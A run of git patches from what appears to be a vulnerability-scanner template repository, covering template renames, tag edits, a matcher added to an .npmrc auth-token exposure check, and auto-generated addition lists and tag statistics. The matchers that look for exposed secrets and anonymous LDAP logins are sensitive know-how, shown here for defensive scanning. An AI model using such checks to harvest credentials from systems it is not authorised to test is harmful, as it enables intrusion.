From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 05:03:00 +0000 Subject: [PATCH 0910/1415] Auto Generated New Template Addition List [Sun Dec 4 05:03:00 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 002ce569b0..40fbed8f09 100644 --- a/.new-additions +++ b/.new-additions @@ -56,6 +56,7 @@ network/misconfig/dropbear-weakalgo.yaml network/misconfig/dropbear-weakmac.yaml takeovers/meteor-takeover.yaml technologies/aerocms-detect.yaml +technologies/goliath-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml technologies/vbulletin-detect.yaml From 7a1dffa77f3a36f7d8620e638c894835b55b06c9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 4 Dec 2022 10:44:41 +0530 Subject: [PATCH 0911/1415] Update and rename network/ldap-anonymous-login.yaml to network/default-login/ldap-anonymous-login.yaml --- network/{ => default-login}/ldap-anonymous-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename network/{ => default-login}/ldap-anonymous-login.yaml (100%) diff --git a/network/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml similarity index 100% rename from network/ldap-anonymous-login.yaml rename to network/default-login/ldap-anonymous-login.yaml index 95c7f055b9..45d80cce99 100644 --- a/network/ldap-anonymous-login.yaml +++ b/network/default-login/ldap-anonymous-login.yaml @@ -8,11 +8,11 @@ info: reference: - https://www.tenable.com/plugins/nessus/10723 - https://ldap.com/ldapv3-wire-protocol-reference-bind + remediation: Configure the service to disallow NULL BINDs. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-284 - remediation: Configure the service to disallow NULL BINDs. tags: network,ldap,default-login network: From 277f4a7da8e8131a800133a37a9f03a2f1c0dadb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 05:17:07 +0000 Subject: [PATCH 0912/1415] Auto Generated New Template Addition List [Sun Dec 4 05:17:07 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 40fbed8f09..707ad451e9 100644 --- a/.new-additions +++ b/.new-additions @@ -51,6 +51,7 @@ misconfiguration/rabbitmq-exporter-metrics.yaml misconfiguration/s3-torrent.yaml misconfiguration/symfony-fosjrouting-bundle.yaml misconfiguration/unauth-etherpad.yaml +network/default-login/ldap-anonymous-login.yaml network/detection/dropbear-cbc-ciphers.yaml network/misconfig/dropbear-weakalgo.yaml network/misconfig/dropbear-weakmac.yaml From 5a6e36f348f3dbf1c0963032dd076a0b4b030e9a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 05:32:13 +0000 Subject: [PATCH 0913/1415] Auto Generated CVE annotations [Sun Dec 4 05:32:13 UTC 2022] :robot: --- network/default-login/ldap-anonymous-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml index 45d80cce99..cfe8eebc1d 100644 --- a/network/default-login/ldap-anonymous-login.yaml +++ b/network/default-login/ldap-anonymous-login.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-284 - tags: network,ldap,default-login + tags: network,ldap,default-login,tenable network: - inputs: From 1144c2190b3015af9d4bbd4a7d48db30d89d39a3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 4 Dec 2022 11:12:40 +0530 Subject: [PATCH 0914/1415] Update npmrc-authtoken.yaml --- exposures/files/npmrc-authtoken.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/exposures/files/npmrc-authtoken.yaml b/exposures/files/npmrc-authtoken.yaml index d573b8c253..ed60448585 100644 --- a/exposures/files/npmrc-authtoken.yaml +++ b/exposures/files/npmrc-authtoken.yaml @@ -25,6 +25,14 @@ requests: - "_auth=" condition: or + - type: word + part: header + words: + - "text/html" + - "application/javascript" + - "application/json" + negative: true + - type: status status: - 200 From 321bacceab5c840482f62de907813530665335cc Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 4 Dec 2022 11:13:39 +0530 Subject: [PATCH 0916/1415] Update openstack-user-secrets.yaml --- exposures/files/openstack-user-secrets.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/openstack-user-secrets.yaml b/exposures/files/openstack-user-secrets.yaml index eb3f829ca7..edba628d4a 100644 --- a/exposures/files/openstack-user-secrets.yaml +++ b/exposures/files/openstack-user-secrets.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true github-query: filename:user_secrets.yml - tags: openstack,config,exposure + tags: openstack,config,exposure,files requests: - method: GET From 306c02ea921726742bc73aa8f16214f42b91935c Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 4 Dec 2022 11:15:40 +0530 Subject: [PATCH 0918/1415] Rename opencart-login.yaml to opencart-panel.yaml --- exposed-panels/{opencart-login.yaml => opencart-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{opencart-login.yaml => opencart-panel.yaml} (100%) diff --git a/exposed-panels/opencart-login.yaml b/exposed-panels/opencart-panel.yaml similarity index 100% rename from exposed-panels/opencart-login.yaml rename to exposed-panels/opencart-panel.yaml From 72c8480954ee15197b1886eec875e6221a534efa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 05:45:54 +0000 Subject: [PATCH 0919/1415] Auto Generated New Template Addition List [Sun Dec 4 05:45:54 UTC 2022] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index 707ad451e9..971225d2bb 100644 --- a/.new-additions +++ b/.new-additions @@ -24,7 +24,7 @@ exposed-panels/locklizard-webviewer-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/mikrotik/mikrotik-routeros-old.yaml exposed-panels/nuxeo-platform-panel.yaml -exposed-panels/opencart-login.yaml +exposed-panels/opencart-panel.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml exposed-panels/riseup-panel.yaml From 4c46f809a3bcfc25909bba476e3625e1ffd9d646 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 4 Dec 2022 11:22:03 +0530 Subject: [PATCH 0920/1415] Update jetbrains-webservers.yaml --- exposures/files/jetbrains-webservers.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/jetbrains-webservers.yaml b/exposures/files/jetbrains-webservers.yaml index d73c1dc27e..6fa54683ba 100644 --- a/exposures/files/jetbrains-webservers.yaml +++ b/exposures/files/jetbrains-webservers.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true google-query: intitle:"index of" "WebServers.xml" - tags: jetbrains,config,edb + tags: jetbrains,config,edb,files requests: - method: GET From fe1730c9d303a9bc7c0aa966e9aa8745bdd40db5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 4 Dec 2022 11:23:46 +0530 Subject: [PATCH 0922/1415] Update backpack-admin-panel.yaml --- exposed-panels/backpack/backpack-admin-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/backpack/backpack-admin-panel.yaml b/exposed-panels/backpack/backpack-admin-panel.yaml index e8efd17506..13466bc0e1 100644 --- a/exposed-panels/backpack/backpack-admin-panel.yaml +++ b/exposed-panels/backpack/backpack-admin-panel.yaml @@ -16,7 +16,6 @@ requests: path: - "{{BaseURL}}/admin/login" - matchers-condition: and matchers: - type: word part: body From 5370c55fc14c76a37825875019d5ff22c4a56c1b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 4 Dec 2022 11:25:58 +0530 Subject: [PATCH 0924/1415] Update workerman-websocket-detect.yaml --- technologies/workerman-websocket-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/workerman-websocket-detect.yaml b/technologies/workerman-websocket-detect.yaml index 19c460f738..aa8b873cdb 100644 --- a/technologies/workerman-websocket-detect.yaml +++ b/technologies/workerman-websocket-detect.yaml @@ -17,7 +17,6 @@ requests: path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word part: header From 456df618648adf85077ea8ef5d66b932f1354d7b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 4 Dec 2022 11:54:13 +0530 Subject: [PATCH 0926/1415] Update mysqld-exporter-metrics.yaml --- misconfiguration/mysqld-exporter-metrics.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/mysqld-exporter-metrics.yaml b/misconfiguration/mysqld-exporter-metrics.yaml index a211c4fd73..5ceb1a3d80 100644 --- a/misconfiguration/mysqld-exporter-metrics.yaml +++ b/misconfiguration/mysqld-exporter-metrics.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"MySQLd exporter" - tags: mysqld,exposure,debug + tags: mysqld,exposure,debug,misconfig requests: - method: GET From b11aa8b831950984e5d0b39271235a75ac72cc1d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 07:38:54 +0000 Subject: [PATCH 0928/1415] Auto Generated New Template Addition List [Sun Dec 4 07:38:54 UTC 2022] :robot: --- .new-additions | 70 -------------------------------------------------- 1 file changed, 70 deletions(-) diff --git a/.new-additions b/.new-additions index 971225d2bb..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,70 +0,0 @@ -cves/2012/CVE-2012-0394.yaml -cves/2020/CVE-2020-26248.yaml -cves/2021/CVE-2021-3110.yaml -cves/2021/CVE-2021-43421.yaml -cves/2022/CVE-2022-1883.yaml -cves/2022/CVE-2022-1916.yaml -cves/2022/CVE-2022-1933.yaml -cves/2022/CVE-2022-2034.yaml -cves/2022/CVE-2022-25481.yaml -cves/2022/CVE-2022-3506.yaml -cves/2022/CVE-2022-45933.yaml -default-logins/nsicg/nsicg-default-login.yaml -default-logins/versa/versa-flexvnf-default-login.yaml -exposed-panels/asus-router-panel.yaml -exposed-panels/backpack/backpack-admin-panel.yaml -exposed-panels/cisco/cisco-webvpn-detect.yaml -exposed-panels/cudatel-panel.yaml -exposed-panels/dqs-superadmin-panel.yaml -exposed-panels/dradis-pro-panel.yaml -exposed-panels/exolis-engage-panel.yaml -exposed-panels/fastpanel-hosting-control-panel.yaml -exposed-panels/flahscookie-superadmin-panel.yaml -exposed-panels/locklizard-webviewer-panel.yaml -exposed-panels/mach-proweb-login.yaml -exposed-panels/mikrotik/mikrotik-routeros-old.yaml -exposed-panels/nuxeo-platform-panel.yaml -exposed-panels/opencart-panel.yaml -exposed-panels/pega-web-panel.yaml -exposed-panels/persis-panel.yaml -exposed-panels/riseup-panel.yaml -exposed-panels/superadmin-ui-panel.yaml -exposed-panels/versa/versa-director-login.yaml -exposed-panels/versa/versa-flexvnf-panel.yaml -exposed-panels/vodafone-voxui-panel.yaml -exposed-panels/zyxel-router-panel.yaml -exposures/configs/sftp-config-exposure.yaml -exposures/configs/sftp-deployment-config.yaml -exposures/files/dbeaver-database-connections.yaml -exposures/files/jetbrains-webservers.yaml -exposures/files/npmrc-authtoken.yaml -exposures/files/openstack-user-secrets.yaml -exposures/logs/ffserver-status.yaml -misconfiguration/collectd-exporter-metrics.yaml -misconfiguration/installer/oxid-eshop-installer.yaml -misconfiguration/libvirt-exporter-metrics.yaml -misconfiguration/lvm-exporter-metrics.yaml -misconfiguration/mysqld-exporter-metrics.yaml -misconfiguration/namedprocess-exporter-metrics.yaml -misconfiguration/postgres-exporter-metrics.yaml -misconfiguration/rabbitmq-exporter-metrics.yaml -misconfiguration/s3-torrent.yaml -misconfiguration/symfony-fosjrouting-bundle.yaml -misconfiguration/unauth-etherpad.yaml -network/default-login/ldap-anonymous-login.yaml -network/detection/dropbear-cbc-ciphers.yaml -network/misconfig/dropbear-weakalgo.yaml -network/misconfig/dropbear-weakmac.yaml -takeovers/meteor-takeover.yaml -technologies/aerocms-detect.yaml -technologies/goliath-detect.yaml -technologies/oracle-httpserver12c.yaml -technologies/payara-micro-server-detect.yaml -technologies/vbulletin-detect.yaml -technologies/versa-flexvnf-server.yaml -technologies/versa/versa-director-api.yaml -technologies/versa/versa-networks-detect.yaml -technologies/workerman-websocket-detect.yaml -token-spray/api-giphy.yaml -vulnerabilities/other/inspur-clusterengine-rce.yaml -vulnerabilities/wordpress/wptouch-xss.yaml From 2229bb6ef1914f2c6deb23e2f824e4c2f44bfbdd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 07:40:07 +0000 Subject: [PATCH 0929/1415] Auto README Update [Sun Dec 4 07:40:07 UTC 2022] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2ac124b44d..c21735b51c 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | | | tech | 349 | princechaddha | 153 | file | 78 | | | | | -**314 directories, 4660 files**. +**321 directories, 4733 files**. </td> </tr> From 2ce6154ce2bf24aec90ae36f051cbb8fa03bd724 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 15:14:21 +0000 Subject: [PATCH 0930/1415] Auto Generated Templates Stats [Sun Dec 4 15:14:21 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 4394 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 2228 insertions(+), 2188 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 82aaee0127..c1422e784c 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1538},{"name":"panel","count":755},{"name":"edb","count":578},{"name":"xss","count":537},{"name":"exposure","count":536},{"name":"lfi","count":519},{"name":"wordpress","count":465},{"name":"cve2021","count":366},{"name":"wp-plugin","count":360},{"name":"tech","count":349},{"name":"rce","count":345},{"name":"packetstorm","count":291},{"name":"cve2022","count":262},{"name":"wpscan","count":252},{"name":"token-spray","count":235},{"name":"misconfig","count":221},{"name":"cve2020","count":221},{"name":"","count":195},{"name":"unauth","count":194},{"name":"wp","count":182},{"name":"kev","count":167},{"name":"config","count":163},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":130},{"name":"oast","count":127},{"name":"apache","count":126},{"name":"iot","count":123},{"name":"authenticated","count":118},{"name":"sqli","count":115},{"name":"cve2010","count":111},{"name":"redirect","count":90},{"name":"router","count":90},{"name":"files","count":89},{"name":"login","count":88},{"name":"network","count":76},{"name":"devops","count":75},{"name":"takeover","count":74},{"name":"token","count":74},{"name":"ssrf","count":72},{"name":"cve2017","count":70},{"name":"cms","count":67},{"name":"auth-bypass","count":65},{"name":"file","count":65},{"name":"oracle","count":62},{"name":"intrusive","count":59},{"name":"install","count":58},{"name":"seclists","count":57},{"name":"disclosure","count":56},{"name":"oss","count":51},{"name":"cisco","count":49},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"fileupload","count":47},{"name":"cve2015","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"plugin","count":41},{"name":"cve2014","count":41},{"name":"vulhub","count":38},{"name":"atlassian","count":38},{"name":"vmware","count":38},{"name":"logs","count":37},{"name":"traversal","count":35},{"name":"springboot","count":35},{"name":"tenable","count":35},{"name":"hackerone","count":34},{"name":"injection","count":33},{"name":"jira","count":32},{"name":"listing","count":31},{"name":"debug","count":30},{"name":"kubernetes","count":29},{"name":"huntr","count":29},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"log4j","count":26},{"name":"sap","count":25},{"name":"microsoft","count":25},{"name":"cnvd","count":25},{"name":"jndi","count":23},{"name":"proxy","count":23},{"name":"misc","count":23},{"name":"aws","count":22},{"name":"php","count":22},{"name":"fuzz","count":21},{"name":"zoho","count":21},{"name":"wp-theme","count":21},{"name":"manageengine","count":21},{"name":"cloud","count":20},{"name":"cve2012","count":20},{"name":"weblogic","count":20},{"name":"ibm","count":19},{"name":"tomcat","count":19},{"name":"camera","count":19},{"name":"cicd","count":19},{"name":"k8s","count":19},{"name":"api","count":19},{"name":"deserialization","count":19},{"name":"dlink","count":18},{"name":"gitlab","count":18},{"name":"service","count":17},{"name":"firewall","count":17},{"name":"wavlink","count":17},{"name":"jenkins","count":17},{"name":"struts","count":16},{"name":"printer","count":16},{"name":"ftp","count":16},{"name":"cve2011","count":15},{"name":"xxe","count":15},{"name":"cve2009","count":15},{"name":"nginx","count":15},{"name":"fortinet","count":14},{"name":"java","count":14},{"name":"hp","count":14},{"name":"android","count":14},{"name":"domainmod","count":14},{"name":"msf","count":13},{"name":"lfr","count":13},{"name":"magento","count":13},{"name":"amazon","count":13},{"name":"cve2013","count":13},{"name":"abstractapi","count":13},{"name":"woocommerce","count":13},{"name":"confluence","count":13},{"name":"status","count":13},{"name":"netsweeper","count":12},{"name":"drupal","count":12},{"name":"rails","count":12},{"name":"ruijie","count":12},{"name":"graphql","count":12},{"name":"netgear","count":12},{"name":"backup","count":12},{"name":"microweber","count":12},{"name":"cve2008","count":12},{"name":"github","count":12},{"name":"ssl","count":11},{"name":"airflow","count":11},{"name":"cisa","count":11},{"name":"azure","count":11},{"name":"vpn","count":11},{"name":"mail","count":11},{"name":"backdoor","count":11},{"name":"webserver","count":11},{"name":"fortigate","count":11},{"name":"cnvd2021","count":11},{"name":"glpi","count":10},{"name":"grafana","count":10},{"name":"git","count":10},{"name":"laravel","count":10},{"name":"ruby","count":10},{"name":"coldfusion","count":10},{"name":"zyxel","count":10},{"name":"django","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"dell","count":10},{"name":"iis","count":9},{"name":"zimbra","count":9},{"name":"fastjson","count":9},{"name":"wso2","count":9},{"name":"kube","count":9},{"name":"prometheus","count":9},{"name":"phpmyadmin","count":9},{"name":"dedecms","count":9},{"name":"ssti","count":9},{"name":"windows","count":9},{"name":"zabbix","count":9},{"name":"vcenter","count":9},{"name":"sonicwall","count":9},{"name":"audit","count":8},{"name":"auth","count":8},{"name":"config-audit","count":8},{"name":"recon","count":8},{"name":"cisco-switch","count":8},{"name":"headless","count":8},{"name":"metadata","count":8},{"name":"elasticsearch","count":8},{"name":"jboss","count":8},{"name":"citrix","count":8},{"name":"solarview","count":8},{"name":"kafka","count":8},{"name":"scada","count":8},{"name":"mirai","count":8},{"name":"hms","count":8},{"name":"solr","count":8},{"name":"blind","count":7},{"name":"exchange","count":7},{"name":"druid","count":7},{"name":"detect","count":7},{"name":"nodejs","count":7},{"name":"squirrelmail","count":7},{"name":"jetbrains","count":7},{"name":"firebase","count":7},{"name":"samsung","count":7},{"name":"symfony","count":7},{"name":"go","count":7},{"name":"opencats","count":7},{"name":"icewarp","count":7},{"name":"docker","count":7},{"name":"maps","count":7},{"name":"npm","count":7},{"name":"bucket","count":7},{"name":"seeyon","count":7},{"name":"python","count":7},{"name":"cnvd2020","count":7},{"name":"rconfig","count":6},{"name":"crlf","count":6},{"name":"jamf","count":6},{"name":"fpd","count":6},{"name":"enum","count":6},{"name":"huawei","count":6},{"name":"zhiyuan","count":6},{"name":"microstrategy","count":6},{"name":"sitecore","count":6},{"name":"cache","count":6},{"name":"ognl","count":6},{"name":"kubelet","count":6},{"name":"smtp","count":6},{"name":"bypass","count":6},{"name":"opensis","count":6},{"name":"moodle","count":6},{"name":"artica","count":6},{"name":"ssh","count":6},{"name":"db","count":6},{"name":"openvpn","count":6},{"name":"setup","count":6},{"name":"emerge","count":6},{"name":"ofbiz","count":6},{"name":"node","count":6},{"name":"lucee","count":6},{"name":"jetty","count":6},{"name":"magmi","count":6},{"name":"vms","count":6},{"name":"websphere","count":6},{"name":"liferay","count":6},{"name":"cobbler","count":6},{"name":"ecology","count":6},{"name":"bigip","count":6},{"name":"slack","count":6},{"name":"activemq","count":6},{"name":"alibaba","count":5},{"name":"prestashop","count":5},{"name":"symantec","count":5},{"name":"fatpipe","count":5},{"name":"plesk","count":5},{"name":"parallels","count":5},{"name":"elfinder","count":5},{"name":"solarwinds","count":5},{"name":"carrental","count":5},{"name":"mongodb","count":5},{"name":"rfi","count":5},{"name":"storage","count":5},{"name":"cockpit","count":5},{"name":"awstats","count":5},{"name":"error","count":5},{"name":"firmware","count":5},{"name":"metinfo","count":5},{"name":"filemanager","count":5},{"name":"rseenet","count":5},{"name":"avideo","count":5},{"name":"apisix","count":5},{"name":"admin","count":5},{"name":"elastic","count":5},{"name":"redis","count":5},{"name":"scan","count":5},{"name":"leak","count":5},{"name":"circarlife","count":5},{"name":"gocd","count":5},{"name":"strapi","count":5},{"name":"gogs","count":5},{"name":"nagios","count":5},{"name":"database","count":5},{"name":"minio","count":5},{"name":"74cms","count":5},{"name":"keycloak","count":5},{"name":"thinkphp","count":5},{"name":"fortios","count":5},{"name":"jellyfin","count":4},{"name":"royalevent","count":4},{"name":"couchdb","count":4},{"name":"kibana","count":4},{"name":"resin","count":4},{"name":"ems","count":4},{"name":"candidats","count":4},{"name":"nexus","count":4},{"name":"openemr","count":4},{"name":"tikiwiki","count":4},{"name":"nosqli","count":4},{"name":"zte","count":4},{"name":"kentico","count":4},{"name":"thinkcmf","count":4},{"name":"linkerd","count":4},{"name":"oa","count":4},{"name":"wcs","count":4},{"name":"photo","count":4},{"name":"hongdian","count":4},{"name":"mailchimp","count":4},{"name":"artifactory","count":4},{"name":"cnvd2019","count":4},{"name":"stripe","count":4},{"name":"sonarqube","count":4},{"name":"vbulletin","count":4},{"name":"axigen","count":4},{"name":"paypal","count":4},{"name":"cacti","count":4},{"name":"tenda","count":4},{"name":"hpe","count":4},{"name":"sangfor","count":4},{"name":"sendgrid","count":4},{"name":"cve2007","count":4},{"name":"postmessage","count":4},{"name":"prtg","count":4},{"name":"flink","count":4},{"name":"xmlrpc","count":4},{"name":"oauth","count":4},{"name":"asp","count":4},{"name":"panos","count":4},{"name":"typo3","count":4},{"name":"gitea","count":4},{"name":"hoteldruid","count":4},{"name":"horde","count":4},{"name":"phpinfo","count":4},{"name":"telerik","count":4},{"name":"umbraco","count":4},{"name":"hybris","count":4},{"name":"kevinlab","count":4},{"name":"redmine","count":4},{"name":"s3","count":4},{"name":"terramaster","count":4},{"name":"roxy","count":4},{"name":"sql","count":4},{"name":"bmc","count":4},{"name":"hashicorp","count":4},{"name":"voip","count":4},{"name":"aspose","count":4},{"name":"gnuboard","count":4},{"name":"caucho","count":4},{"name":"search","count":4},{"name":"yeswiki","count":4},{"name":"ampache","count":4},{"name":"hikvision","count":4},{"name":"beyondtrust","count":4},{"name":"sophos","count":4},{"name":"vrealize","count":4},{"name":"telesquare","count":4},{"name":"adminer","count":4},{"name":"puppet","count":4},{"name":"phppgadmin","count":4},{"name":"springcloud","count":4},{"name":"console","count":4},{"name":"mantisbt","count":3},{"name":"harbor","count":3},{"name":"sugarcrm","count":3},{"name":"synology","count":3},{"name":"smb","count":3},{"name":"bitrix","count":3},{"name":"centos","count":3},{"name":"getsimple","count":3},{"name":"elementor","count":3},{"name":"ec2","count":3},{"name":"geowebserver","count":3},{"name":"trixbox","count":3},{"name":"ampps","count":3},{"name":"lotus","count":3},{"name":"fuelcms","count":3},{"name":"dreambox","count":3},{"name":"dzzoffice","count":3},{"name":"wordfence","count":3},{"name":"selenium","count":3},{"name":"zeroshell","count":3},{"name":"dotcms","count":3},{"name":"nacos","count":3},{"name":"openam","count":3},{"name":"rlm","count":3},{"name":"steve","count":3},{"name":"hsphere","count":3},{"name":"ivanti","count":3},{"name":"metabase","count":3},{"name":"concrete","count":3},{"name":"sentry","count":3},{"name":"mongo","count":3},{"name":"teamcity","count":3},{"name":"ansible","count":3},{"name":"octobercms","count":3},{"name":"trendnet","count":3},{"name":"finecms","count":3},{"name":"rocketchat","count":3},{"name":"ebs","count":3},{"name":"fileman","count":3},{"name":"modem","count":3},{"name":"goanywhere","count":3},{"name":"sharepoint","count":3},{"name":"zend","count":3},{"name":"axis","count":3},{"name":"lansweeper","count":3},{"name":"weiphp","count":3},{"name":"blockchain","count":3},{"name":"graph","count":3},{"name":"digitalocean","count":3},{"name":"mautic","count":3},{"name":"odoo","count":3},{"name":"webmin","count":3},{"name":"processwire","count":3},{"name":"splunk","count":3},{"name":"subrion","count":3},{"name":"cloudflare","count":3},{"name":"dom","count":3},{"name":"mcafee","count":3},{"name":"samba","count":3},{"name":"openbmcs","count":3},{"name":"avtech","count":3},{"name":"netdata","count":3},{"name":"log","count":3},{"name":"bitbucket","count":3},{"name":"key","count":3},{"name":"linksys","count":3},{"name":"buffalo","count":3},{"name":"targa","count":3},{"name":"webmail","count":3},{"name":"grav","count":3},{"name":"r-seenet","count":3},{"name":"servicenow","count":3},{"name":"facebook","count":3},{"name":"axis2","count":3},{"name":"voipmonitor","count":3},{"name":"codeigniter","count":3},{"name":"ruckus","count":3},{"name":"3cx","count":3},{"name":"bigant","count":3},{"name":"qnap","count":3},{"name":"thinfinity","count":3},{"name":"pip","count":3},{"name":"drawio","count":3},{"name":"kkfileview","count":3},{"name":"rackn","count":3},{"name":"proftpd","count":3},{"name":"jfrog","count":3},{"name":"fanruan","count":3},{"name":"yonyou","count":3},{"name":"labkey","count":3},{"name":"circleci","count":3},{"name":"graylog","count":3},{"name":"digitalrebar","count":3},{"name":"dolibarr","count":3},{"name":"selea","count":3},{"name":"kfm","count":3},{"name":"express","count":3},{"name":"globalprotect","count":3},{"name":"pfsense","count":3},{"name":"glassfish","count":3},{"name":"openfire","count":3},{"name":"actuator","count":3},{"name":"intercom","count":3},{"name":"telnet","count":3},{"name":"seagate","count":3},{"name":"movable","count":3},{"name":"redash","count":3},{"name":"jeesns","count":3},{"name":"jupyter","count":3},{"name":"bruteforce","count":3},{"name":"matrix","count":3},{"name":"thruk","count":3},{"name":"square","count":3},{"name":"epson","count":3},{"name":"cve2005","count":3},{"name":"pentaho","count":3},{"name":"tableau","count":3},{"name":"webadmin","count":3},{"name":"panabit","count":3},{"name":"nuuo","count":3},{"name":"messaging","count":3},{"name":"httpserver","count":3},{"name":"nortek","count":3},{"name":"empirecms","count":3},{"name":"kingsoft","count":3},{"name":"unifi","count":3},{"name":"microfocus","count":3},{"name":"aptus","count":3},{"name":"geoserver","count":3},{"name":"httpbin","count":3},{"name":"consul","count":3},{"name":"mobileiron","count":3},{"name":"httpd","count":3},{"name":"netlify","count":3},{"name":"rabbitmq","count":3},{"name":"heroku","count":3},{"name":"frp","count":2},{"name":"azkaban","count":2},{"name":"highmail","count":2},{"name":"pega","count":2},{"name":"netsus","count":2},{"name":"atmail","count":2},{"name":"pulse","count":2},{"name":"sniplets","count":2},{"name":"osticket","count":2},{"name":"idor","count":2},{"name":"wooyun","count":2},{"name":"aqua","count":2},{"name":"forum","count":2},{"name":"gespage","count":2},{"name":"netscaler","count":2},{"name":"projectsend","count":2},{"name":"flatpress","count":2},{"name":"workspaceone","count":2},{"name":"adiscon","count":2},{"name":"hospital","count":2},{"name":"seacms","count":2},{"name":"ovirt","count":2},{"name":"favicon","count":2},{"name":"zms","count":2},{"name":"backups","count":2},{"name":"bigbluebutton","count":2},{"name":"owncloud","count":2},{"name":"conductor","count":2},{"name":"smartstore","count":2},{"name":"wapples","count":2},{"name":"chiyu","count":2},{"name":"kavita","count":2},{"name":"middleware","count":2},{"name":"puppetdb","count":2},{"name":"sass","count":2},{"name":"eko","count":2},{"name":"watchguard","count":2},{"name":"javamelody","count":2},{"name":"circontrol","count":2},{"name":"exacqvision","count":2},{"name":"werkzeug","count":2},{"name":"password","count":2},{"name":"domxss","count":2},{"name":"f5","count":2},{"name":"gophish","count":2},{"name":"openssh","count":2},{"name":"tileserver","count":2},{"name":"fortimail","count":2},{"name":"rackstation","count":2},{"name":"testrail","count":2},{"name":"piwigo","count":2},{"name":"opsview","count":2},{"name":"newrelic","count":2},{"name":"froxlor","count":2},{"name":"otobo","count":2},{"name":"wuzhicms","count":2},{"name":"draytek","count":2},{"name":"cocoon","count":2},{"name":"servicedesk","count":2},{"name":"pacsone","count":2},{"name":"vidyo","count":2},{"name":"virtua","count":2},{"name":"jeedom","count":2},{"name":"embed","count":2},{"name":"dataiku","count":2},{"name":"matomo","count":2},{"name":"kkFileView","count":2},{"name":"showdoc","count":2},{"name":"apereo","count":2},{"name":"craftcms","count":2},{"name":"arcgis","count":2},{"name":"mailgun","count":2},{"name":"ericsson","count":2},{"name":"bash","count":2},{"name":"rosariosis","count":2},{"name":"wamp","count":2},{"name":"homematic","count":2},{"name":"graphite","count":2},{"name":"spark","count":2},{"name":"gradle","count":2},{"name":"commax","count":2},{"name":"codemeter","count":2},{"name":"skycaiji","count":2},{"name":"ebook","count":2},{"name":"xiaomi","count":2},{"name":"kiwitcms","count":2},{"name":"ad","count":2},{"name":"cloudinary","count":2},{"name":"gitlist","count":2},{"name":"places","count":2},{"name":"rancher","count":2},{"name":"cgi","count":2},{"name":"livezilla","count":2},{"name":"acrolinx","count":2},{"name":"xenmobile","count":2},{"name":"eprints","count":2},{"name":"tongda","count":2},{"name":"listserv","count":2},{"name":"idrac",